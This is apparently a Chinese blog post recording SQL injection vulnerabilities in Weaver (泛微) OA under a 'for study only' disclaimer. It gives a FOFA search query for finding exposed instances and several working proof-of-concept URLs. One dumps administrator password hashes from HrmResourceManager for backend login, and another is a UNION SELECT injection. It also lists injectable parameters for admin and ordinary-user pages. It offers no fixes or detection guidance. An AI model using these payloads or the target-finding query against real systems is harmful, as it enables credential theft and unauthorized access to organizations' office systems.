2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。
漏洞描述
泛微OA不同版本都存在SQL注入漏洞
FOFA
app=“泛微-协同办公OA”
漏洞复现
1、泛微OA V8 SQL注入漏洞
POC
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
返回了数据库第一条记录的值
通过解密后,可以登录后台(漏洞原理可参考附录文章)
2、泛微OA某版本的SQL注入漏洞(核实中)
POC
http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user
3、后台SQL注入
使用测试账户登录,然后访问
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=
其中的CONTENT_ID参数能够注射SQL语句。
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=
管理员情况下的注入:
http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1
普通用户注入:
http://xx.cn//cowork/CoworkLogView.jsp?id=151
普通用户注入地址:
http://xx.cn/system/basedata/basedata_role.jsp?roleid=32
普通用户注入地址:
http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3